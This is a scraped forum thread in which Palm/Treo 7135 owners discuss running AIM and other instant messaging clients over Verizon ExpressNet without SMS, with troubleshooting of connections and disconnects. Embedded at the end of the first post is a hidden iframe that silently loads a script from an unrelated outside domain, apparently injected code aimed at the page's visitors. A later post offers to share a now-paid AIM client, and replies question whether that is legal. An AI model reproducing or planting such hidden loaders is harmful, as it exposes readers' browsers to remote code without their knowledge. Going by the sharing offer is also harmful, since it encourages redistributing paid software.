First off, this is absolutely the best forum I have ever seen! I've learned so much just by reading the previous messages that I've never needed to ask a question...until now.
I would like to use public instant messaging via Verizon ExpressNet (specifically AIM) without requiring SMS. I looked at Verichat thinking it would be the ticket (good reviews from this forum), but it requires an SMS address. I have to pay extra for SMS, so that won't work for me.
I wanted to try the Palm AIM client from AOL but couldn't find a trial version. It looks like you gotta pay 20 bucks just to try it out. After reading a couple of posts on this forum about folks having problems with the AOL AIM software, I aint about to plop down 20 just to try it out...unless someone convinces me that it REALLY is a good app and worth the money.
The perfect solution for me is a plain ol' IM client that will talk to AOL users via TCP/IP without any backend proxy or SMS conversion (or whatever the heck Verichat needs SMS for) just like AIM or Trillian on Windows.
If anyone has any suggestions, I sure would appreciate 'em!
Finally...thank all of you who are active on this forum! You are invaluable!!! Specifically thanks for letting me know about TakePhone, SnapperMail, AvantGo, and BackupBuddy, these applications really enhance the 7135 (which is, HANDS DOWN, one of the coolest and most useful things I've ever owned in my life).<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
I have AIM v. 1.1 which was free when I downloaded it, I have no problem uploading it if no one on this forum has issue, specifically the site owners.
I can make no guarantee it works on a 7135 as I don't own one.

Since AOL is now selling it, you would be better off taking this to private messaging and exchange emails if you want to provide it.
I too am using the version aquired before AOL started charging and have no real problems on my 7135, although I find AIM by SMS a bit more convenient for my needs. I also have the palm ICQ client (which is still free) and it works well too.
I figured that was best, but I don't want to post my email.
I also am not sure on the legality of it.
I also have AOL from before they started charging for it, but I noticed the other day when power was out here that AOL broke it so that you have to upgrade. I was pretty pleased about that.
upIRC (formerly apIRC) is a client for Internet Relay Chat
IRC) servers. It is faster, more stable, and offers more
features than any other IRC client for Palm OS,
including the following:
- DCC chat support
- Join up to 10 channels (2 in shareware version)
- Auto-completion of common commands
- Logging of display text to DOC database
- Shortcut lists for servers and channels
- One-tap shortcut for entering nicknames
- Flexible command shortcut system
blingbling...hmmmmm...charging...so far, I haven't been charged any extra fees above my normal calling plan rate when using EN (knock on wood). There are a couple of threads on this forum that seem to indicate that it should, or eventually will, cost extra. But for now, it's not costing me anything.
If Verizon does start charging me for using EN, I'll just use the old Q2N. It should work fine for instant messaging. Even Q2N has less latency than SMS (from my experience).
As a side note; I only use instant messaging when I want to contact someone, so it doesn't matter to me that I'm not available until I connect via EN (or Q2N). You might keep that in mind as you evaluate IM client software.
Anyone know if downloading the AIM UK version makes a difference logging in with your screen name and password that was setup in US version as I'm using the AIM UK version and can't connect for some reason.
I'm using the UK version now and everything seems to be working fine.
I initially experienced the problem mentioned earlier about the program not disconnecting. But I found that if I close all my chat sessions and sign off from the main buddy list view, it has disconnected every time.
Finally connected to AIM network using the UK AIM download. I think my signal was too weak from my home last night to connect. In office now and connects fine, but now my new problem is I can sign off AIM network but it does not close my Verizon connection (green lcd). Nothing in the option tab to disconnect from network like with other programs. Only way is to turn phone off. Is this a fault of the AIM program or is there another way to disconnect from the network without shutting phone off?
Thx
